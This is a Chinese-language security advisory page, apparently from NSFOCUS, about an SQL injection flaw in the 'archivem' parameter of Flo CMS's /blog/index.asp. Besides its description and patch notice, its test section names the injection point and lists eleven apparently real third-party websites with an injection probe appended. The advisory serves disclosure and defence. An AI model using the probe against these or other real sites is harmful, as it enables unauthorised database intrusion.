安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
Flo CMS "archivem" SQL注入漏洞
发布日期:
2013-09-05
更新日期:
2013-09-06
受影响系统:
Flo CMS Flo CMS
描述:
Flo CMS是内容管理系统。
Flo CMS没有正确过滤/blog/index.asp的"archivem" GET参数,远程攻击者通过注入任意SQL代码,即可利用此漏洞操作SQL查询。
<*来源:Ashiyane Digital Security Team
链接:
http://secunia.com/advisories/54678/
http://packetstormsecurity.com/files/123058/Flo-CMS-SQL-Injection.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# [+] Exploit :
#
# [+] Location : [Target]/blog/index.asp?archivem=[Sql Injection]
#
#-------
# Proof:
#-------
#
#
http://www.kellschamber.ie/blog/index.asp?archivem='
#
#
http://www.locumotion.com/blog/index.asp?archivem='
#
#
http://www.tamhnach.org/blog/index.asp?archivem='
#
#
http://www.royaltaragolfclub.com/blog/index.asp?archivem='
#
#
http://www.thebective.ie/blog/index.asp?archivem='
#
#
http://www.slanefarmhostel.ie/blog/index.asp?archivem='
#
#
http://www.sandbar.ie/blog/index.asp?archivem='
#
#
http://www.recruitmentbureau.com/blog/index.asp?archivem='
#
#
http://www.joecurrancommercials.com/blog/index.asp?archivem='
#
#
http://www.littonlanetraining.com/blog/index.asp?archivem='
#
#
http://www.kentstownmontessori.com//blog/index.asp?archivem='
建议:
厂商补丁:
Flo CMS
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.flocms.ie
浏览次数:
3779
严重程度:
0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客